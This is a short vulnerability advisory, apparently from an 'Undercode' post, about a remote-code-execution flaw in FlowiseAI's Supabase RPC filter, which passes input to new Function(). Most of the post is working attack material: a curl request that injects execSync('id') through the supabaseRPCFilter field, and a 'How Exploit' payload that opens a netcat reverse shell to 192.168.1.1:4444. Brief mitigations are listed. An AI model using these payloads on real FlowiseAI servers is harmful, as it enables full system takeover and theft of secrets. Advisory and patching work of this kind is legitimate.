Listen to this Post
The vulnerability exists within the `Supabase.ts` component of FlowiseAI. An authenticated admin user can supply a malicious string to the ‘Supabase RPC Filter’ configuration field. This user-controlled input (supabaseRPCFilter) is passed directly to the JavaScript `new Function()` constructor on line 237 of the specified file without any sanitization or sandboxing. This dynamically creates and executes a function. An attacker can craft a payload that breaks out of the intended filter logic and calls `process.mainModule.require()` to import the native ‘child_process’ module. By calling `execSync()` on this module, any arbitrary operating system command can be executed with the privileges of the FlowiseAI backend server, leading to full system compromise.
Platform: FlowiseAI
Version: <=1.4.1
Vulnerability: RCE
Severity: Critical
date: 2024-06-05
Prediction: Patch by 2024-06-19
What Undercode Say:
curl -s http://localhost:3000/api/v1/flow/execute -H "Authorization: Bearer <JWT>" -H "Content-Type: application/json" -d '{"flowId":"...","inputValue":"...","supabaseRPCFilter":"filter(process.mainModule.require(\\"child_process\\").execSync(\\"id\\"), \\"gt\\", 5)"}'
// packages/components/nodes/vectorstores/Supabase/Supabase.tsL237
const filter = new Function('fn', 'query', <code>return query.${supabaseRPCFilter}</code>);
How Exploit:
Inject filter expression:
`filter(process.mainModule.require(“child_process”).execSync(“nc 192.168.1.1 4444 -e /bin/sh”), “gt”, 5)`
Protection from this CVE
Update to version 1.4.2.
Sanitize user input.
Implement sandboxing.
Impact:
Remote Code Execution
Secrets Disclosure
System Compromise
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

